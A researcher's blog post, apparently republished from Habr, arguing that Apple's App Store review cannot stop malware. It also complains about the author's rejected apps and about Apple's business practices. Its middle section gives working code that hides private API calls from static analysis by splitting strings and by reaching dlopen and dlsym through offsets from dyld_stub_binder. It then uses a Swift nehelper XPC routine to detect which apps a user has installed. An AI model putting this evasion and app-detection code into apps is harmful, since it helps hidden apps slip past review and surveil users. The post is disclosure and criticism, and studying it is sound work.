How malware gets into the App Store and why Apple can't stop that

3a2ba566997c46b24c2748e6ba0ac430.jpg

Only after I had published a post detailing three iOS 0-day vulnerabilities and expressing my frustration with Apple Security Bounty Program, I received a reply from Apple:

We saw your blog post regarding this issue and your other reports.

We apologize for the delay in responding to you. We want to let you know that we are still investigating these issues and how we can address them to protect customers. Thank you again for taking the time to report these issues to us, we appreciate your assistance.

Please let us know if you have any questions.

Indeed, I do have questions. The same ones that you have ignored. I’m gonna repeat them. Why was the fix for analyticsd vulnerability quietly included in iOS 14.7 update but not mentioned on its security content list? Why did you promise to include it in the next update’s list but broke your words not once but three times? Why do you keep ignoring these questions?

After my previous post, some people have expressed doubts that such code can make its way into the App Store. It’s understandable why they think this way. That’s because Apple makes people believe that the App Store is safe by repeating it over and over. Moreover, they claim that they disallow alternative stores and application sideloading to keep users safe and otherwise they would be in great danger. Android has alternative stores and unrestricted sideloading, and have you heard about any kind of security problems with Android recently? I haven’t. But it the last few months alone there were so many reports about security and privacy issues on Apple platforms. And the real reason that Apple doesn’t allow any alternatives to the App Store is that they receive 30% commission on all purchases made inside any app and it’s a tremendously lucrative business for them. They also enact censorship by choosing to allow or disallow any app into the App Store based purely on subjective opinions of their employees and managers.

So in this article I’m going to dispute the claim that the App Store is safe, voice my complaints about the App Store review process and provide a detailed explanation (including source code) how malicious apps on the App Store conceal their functionality from the App Store review team and are able to sneak into the App Store.

Imagine that a government of some country where homosexuality is punishable by death, has an official app in the App Store used by the majority of the citizens and that it wants to target people based on their sexual orientation. This can be done, for example, by checking if a user has Grindr app installed on their device. That government could conceal malicious code inside their own official app, ship an update to the App Store, and Apple will be unable to detect that.

App Store static analysis

When a binary file of an app is uploaded to Apple servers, it undergoes static analysis. It doesn’t do much except checking a list of strings inside the binary against a predefined set of private API that only Apple’s own apps are allowed to use. If private API usage is detected, the binary will not be uploaded and Apple will send you an email with the list of what they found:

We identified one or more issues with a recent delivery for your app, [APP_NAME_AND_VERSON]. Please correct the following issues, then upload again.

ITMS-90338: Non-public API usage — The app contains or inherits from non-public classes in [APP_NAME]: GKFamiliarPlayerInternal, GKFriendPlayerInternal, GKLocalPlayerInternal. If method names in your source code match the private Apple APIs listed above, altering your method names will help prevent this app from being flagged in future submissions. In addition, note that one or more of the above APIs may be located in a static library that was included with your app. If so, they must be removed. For further information, visit the Technical Support Information at http://developer.apple.com/support/technical/

If that API is in Objective-C, it can be called dynamically through Objective-C runtime, for example, we can address a class GKLocalPlayerInternal (which is used in gamed exploit) like that NSClassFromString("GKLocalPlayerInternal"]). GKLocalPlayerInternal is contained in the list of private API so it’s being searched for inside the binary. However, there are many ways you can conceal it. Simply splitting it into a few parts like that NSClassFromString(["GKLoc","lPlayerInternal"].joined(separator: "a")) is enough to be undetected by static analysis. Gamed exploit has all private API usage already obfuscated so it passes static analysis undetected.

Another way is to use Caesar cipher. I’ve seen this method employed by one very popular app on the App Store with hundreds of millions of downloads. That app supports iOS 9 so the developers are forced to use private API to work around UIKit bugs and to improve experience for people who are unable to install latest iOS version because Apple chose to deem their devices obsolete and abandon support for them.

As an example, starting in iOS 7 Apple has been using a special style of corner rounding for app icons. Since then they implemented that style for corners of all UI components inside their apps — buttons, alerts and so on. That style was made available for third-party developers only in iOS 13 but Apple has been using it for their own apps and system components since iOS 11 by calling a private method setContinuousCorners of CALayer class. That means developers who implement custom UI components inside their apps and want them to look consistent for users with old iOS versions have to use private API and violate the App Store rules.

The code for three other vulnerabilities that I’ve released (analyticsd, nehelper enumerate apps, nehelper wifi info) uses C functions that Apple considers to be a part of private API. Just now I’ve updated their source code to make them call such functions dynamically in order to be undetected by static analysis.

Let me explain how it is possible. There are standard functions called dlopen and dlsym that allow loading dynamic libraries and resolving symbols in them. The usage of these functions might be detected by the App Store review team, but we can avoid addressing them directly. Every iOS binary imports a symbol called dyld_stub_binder. It’s imported from the same library as dlopen and dlsym. That means we can find how far these functions are located from dyld_stub_binder in memory and call them by using only their addresses. This is just a proof of concept, so we will calculate the offsets in advance for one specific iOS version and device model, because they might differ based on these two parameters. The offsets in Github repositories are set to values corresponding to iPhone 7 Plus and iOS 15.0, if they don’t work for your device, you should recalculate them. More sophisticated malware can avoid using predefined offsets and find the addresses dynamically using the signatures of these functions. Here is how we can calculate these values:

printf("%lld\n",(long long)dyld_stub_binder - (long long)dlopen);
printf("%lld\n",(long long)dyld_stub_binder - (long long)dlsym);

And now when we have the offsets, we can define our own functions which will call dlopen and dlsym:

// dlopen
void * normal_function1(const char * arg1, int arg2) {
    return ((void *(*)(const char *, int))((long long)dyld_stub_binder - 20780))(arg1, arg2);
}

// dlsym
void * normal_function2(void * arg1, const char * arg2) {
    return ((void *(*)(void *, const char *))((long long)dyld_stub_binder - 20648))(arg1, arg2);
}

After we import them in Swift, we can rewrite the code that checks whether an app is installed, doing it without importing and referencing any symbols except dyld_stub_binder which is already imported by the binary by default:

let dylib = normal_function1("/usr/lib/system/libxpc.dylib", 0)
let normalFunction3 = unsafeBitCast(normal_function2(dylib, "xpc_connection_create_mach_service"), to: (@convention(c) (UnsafePointer, DispatchQueue?, UInt64) -> (OpaquePointer)).self)
let normalFunction4 = unsafeBitCast(normal_function2(dylib, "xpc_connection_set_event_handler"), to: (@convention(c) (OpaquePointer, @escaping (OpaquePointer) -> Void) -> Void).self)
let normalFunction5 = unsafeBitCast(normal_function2(dylib, "xpc_connection_resume"), to: (@convention(c) (OpaquePointer) -> Void).self)
let normalFunction6 = unsafeBitCast(normal_function2(dylib, "xpc_dictionary_create"), to: (@convention(c) (OpaquePointer?, OpaquePointer?, Int) -> OpaquePointer).self)
let normalFunction7 = unsafeBitCast(normal_function2(dylib, "xpc_dictionary_set_uint64"), to: (@convention(c) (OpaquePointer, UnsafePointer, UInt64) -> Void).self)
let normalFunction8 = unsafeBitCast(normal_function2(dylib, "xpc_dictionary_set_string"), to: (@convention(c) (OpaquePointer, UnsafePointer, UnsafePointer) -> Void).self)
let normalFunction9 = unsafeBitCast(normal_function2(dylib, "xpc_connection_send_message_with_reply_sync"), to: (@convention(c) (OpaquePointer, OpaquePointer) -> OpaquePointer).self)
let normalFunction10 = unsafeBitCast(normal_function2(dylib, "xpc_dictionary_get_value"), to: (@convention(c) (OpaquePointer, UnsafePointer) -> OpaquePointer?).self)

func isAppInstalled(bundleId: String) -> Bool {
    let connection = normalFunction3("com.apple.nehelper", nil, 2)
    normalFunction4(connection, { _ in })
    normalFunction5(connection)
    let xdict = normalFunction6(nil, nil, 0)
    normalFunction7(xdict, "delegate-class-id", 1)
    normalFunction7(xdict, "cache-command", 3)
    normalFunction8(xdict, "cache-signing-identifier", bundleId)
    let reply = normalFunction9(connection, xdict)
    if let resultData = normalFunction10(reply, "result-data"), normalFunction10(resultData, "cache-app-uuid") != nil {
        return true
    }
    return false
}

Note that in order to stay undetected by static analysis, the strings containing function names should be obfuscated or at least split into a few parts like I mentioned earlier. And if Apple dares to say that such things will be detected during review, I’m gonna have to come up with different ways to do it and publish them all.

App Store review process

Now here is what happens when you submit your app for the App Store review. You can read it in more detail in this and this article but basically, a random reviewer downloads the app onto their iPad, taps through all the screens and makes a decision whether to allow it or not based on their own understanding of the App Store Review Guidelines biased by their own subjective opinions and attitudes.

The first thing that a malicious app can do is to connect to a remote server, send details about current user session and ask whether it should perform some malicious action that it contains. The server will detect whether an app is being used by an Apple reviewer and or a normal user and send a response based on that. That means a reviewer will see a totally benign app with nothing suspicious in it and accept it into the App Store. In 2011 a developer and a security researcher Charlie Miller was banned from the App Store after he developed a proof-of-concept app that could steal users' photos and contacts and uploaded it into the App Store. The app successfully passed the review and appeared on the App Store. Apple never detected it until Miller himself informed the public and released the information about the vulnerability and the flaw in the App Store review process. It’s been 10 years, Miller is still banned from the App Store, but nothing changed, a malicious app can easily sneak into the App Store, users' data can be stolen. At the same time when Uber was caught spying on iOS users, they were just warned to stop doing that. Uber app was checking if a user is near Apple headquarters in Cupertino and if that was the case, the malicious code would not be executed to avoid detection by Apple employees.

App Store is also full of scam apps with fake reviews that charge users outrageous amounts of money providing little, if any, functionality. A developer, Kosta Eleftheriou who has recently filed a lawsuit against Apple after being wronged by them, is single-handedly trying to make Apple remove all these apps from the App Store with little success, because Apple receives 30% cut of all the money taken from the victims.

Apple’s anticompetitive practices and discrimination against developers

I had one of my own apps rejected by the App Store review team with the following message:

Your app primarily features astrology, horoscopes, palm reading, fortune telling or zodiac reports. As such, it duplicates the content and functionality of many other similar apps currently available on the App Store. While these app features may be useful, informative or entertaining, we simply have enough of these types of apps on the App Store, and they are considered a form of spam.

The app was free and without any in-app purchases, not like $8/week horoscope with fake reviews, mentioned in this article. It’s very alarming that Apple is trying to stifle competition. I believe, soon we might hear something like that:

Your app primarily features messaging. As such, it duplicates the content and functionality of many other similar apps currently available on the App Store (like Facebook Messenger) and our own very secure iMessage platform. While these app features may be useful, informative or entertaining, we simply have enough of these types of apps on the App Store, and they are considered a form of spam.

Just yesterday Apple cited the same reason when rejecting an update of an accessible game that a developer who is totally blind created for other visually impaired people, saying that their game is similar to other apps in the App Store so it is considered spam. What’s worse, the game was already on the App Store, people were using it, and Apple didn’t allow to publish an update for it. Why is the government doing nothing about this kind of anticompetitive behavior?

I’ve had more of my own problems with the review team. In 2014 I developed and uploaded to the App store a game called Hobo Simulator. It’s about a homeless person who has to survive on the street, find a job and the final goal is to become a president. It was there for 4 years amassing more than 800,000 downloads until it got suddenly removed on November 30, 2018 with the following message:

We are writing to let you know about new information regarding your app, Hobo Simulator, version 1.1, currently live on the App Store. Upon re-evaluation, we found that your app is not in compliance with the App Store Review Guidelines. Specifically, we found: Safety — 1.1 Your app includes content that many users would find objectionable and offensive. For this reason, your app will be removed from sale on the App Store at this time.

My appeal was also rejected and I’ve received a call from an Apple employee saying that they have a problem with the word «hobo», that they didn’t like the icon and the app in general. They said they will never reinstate my app and that I should develop new apps that don’t incorporate that kind of theme. However, at that time (and still) there were quite a few similar apps on the App Store called «Hobo Life», «Hobo — Real Life Simulator» featuring the same content and game mechanics, and my app was the only one removed. When I explained that to the Apple employee on the phone, they said that the point of the call was to inform me about the reason why my app had been removed, not to talk about other apps, and that if I had a complaint about content in other apps, I should file it elsewhere. But my problem wasn’t about content in some other apps, it was about inconsistent application of guidelines by the review team which can be considered to be a blatant discrimination against me based on my ethnicity.

After my app was removed, I found that someone had made its complete clone with very similar UI, color scheme and a complete copy of all content. My app was at the peak of its popularity and when people were searching the App Store for it, they only found that clone and downloaded it thinking it was the one recommended by their friends. I could only file a complaint about intellectual property so that’s what I did. After that Apple started a three-way email conversation with me and the developer who created a clone, revealing their email address to me in the process. The email said that I should resolve the matter myself with the other developer. This can be considered a privacy flaw, because it means that any person can find out an Apple ID email associated with any App Store developer’s account just by filing a complaint about one of their apps. That other developer ignored the email, and when a few weeks Apple contacted me again to ask whether the matter had been resolved, I said no, and they simply removed that other app from the App Store.

In July 2020, 1.5 years later, I’ve created a new bundle ID in the App Store and resubmitted my app for review again. They accepted it, no questions asked. That’s the proof how inconsistent they are and how they don’t keep track of every app that they have removed form the App Store. For now it’s still on the App Store but we will see if Apple decides to strike back against me and remove it.

Chosen developers possessing secret entitlements

Apple claims it’s not a monopolist, that there is a viable alternative to App Store — progressive web apps. But it’s a lie. Apple is making sure that PWA stay inferior compared to the App Store apps by limiting their performance and functionality and disallowing alternative browser engines. And even the App Store apps are severely limited in what they can do compared to Apple’s own apps. But for a few chosen developers these limits are relaxed, Apple quietly makes exceptions by granting them special entitlements unavailable to regular developers.

One example of such special entitlement is com.apple.developer.pushkit.unrestricted-voip. It’s not listed in the developer documentation and Apple doesn’t grant it freely. The only ways to find about its existence are if Apple confidentially tells you about it or you stumble upon it while inspecting apps like WhatsApp, Signal or Telegram, which all have that entitlement. This entitlement removes the restrictions on VoIP push notifications and allows them to be used instead of regular push notifications. VoIP push notifications are vastly superior because they they are delivered without delay, can automatically relaunch the app if its not running and more. Without this entitlement, if your app has received a VoIP notification, it must immediately display an interface for incoming call, otherwise the app will be terminated and system will stop delivering any more VoIP notifications to this app. Even VoIP apps struggle with this restrictions while apps having this entitlement are not restricted and can use VoIP notifications to deliver regular messages from other users of that app. If you use some not very popular social and messaging apps, you may have noticed that sometimes push notifications are delayed or not delivered at all while aforementioned apps always work perfectly. What makes a difference is that secret entitlement. Without it it’s impossible to provide the same level of service and compete with the apps that are given special treatment by Apple.

Even Pavel Durov, whose Telegram app relies on that VoIP entitlement to circumvent attempts of some governments to block access to the app on their territories, recently spoke up against Apple’s complete control of their platform and the danger it poses to freedom of speech.

When a class-action lawsuit forced Apple to allow app developers tell their users about alternative methods of payments, it was a win. But it’s not enough. We saw that Apple refuses to protect their users, so they should at least have the ability to do it on their own. We must put pressure on Apple to open up their platform, to allow alternative app stores and sideloading, allowing users to get more control of their devices, and allowing developers getting fair treatment without corpoprate censorship. In the face of oppression and injustice we must stand together and fight for our freedom.

© Habrahabr.ru